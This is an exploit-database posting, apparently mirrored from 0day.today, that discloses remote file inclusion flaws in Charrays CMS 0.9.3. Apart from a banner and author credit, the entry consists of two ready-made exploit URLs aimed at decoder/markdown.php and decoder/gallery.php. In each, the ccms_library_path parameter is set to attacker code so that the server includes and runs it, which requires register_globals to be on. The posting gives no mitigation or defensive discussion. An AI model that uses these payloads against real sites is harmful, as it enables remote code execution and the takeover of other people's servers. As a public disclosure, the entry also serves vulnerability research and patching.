id: 2325
date: 11/28/2007
title: Charrays CMS 0.9.3 Multiple Remote File Inclusion Vulnerabilities
author: MhZ91
cves: 

=================================================================
Charrays CMS 0.9.3 Multiple Remote File Inclusion Vulnerabilities
=================================================================




---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                          

 
---------------------------------------------------------------


	  Multiple Remote File Inclusion

---------------------------------------------------------------

# Author: MhZ91 

# Download Script: http://sourceforge.net/projects/charray-cms

# register_globals = On 

# Exploit 

# http://[site]/[path]/decoder/markdown.php?ccms_library_path=[Evil_Code]

# http://[site]/[path]/decoder/gallery.php?ccms_library_path=[Evil_Code]

---------------------------------------------------------------



#  0day.today [2023-03-23]  #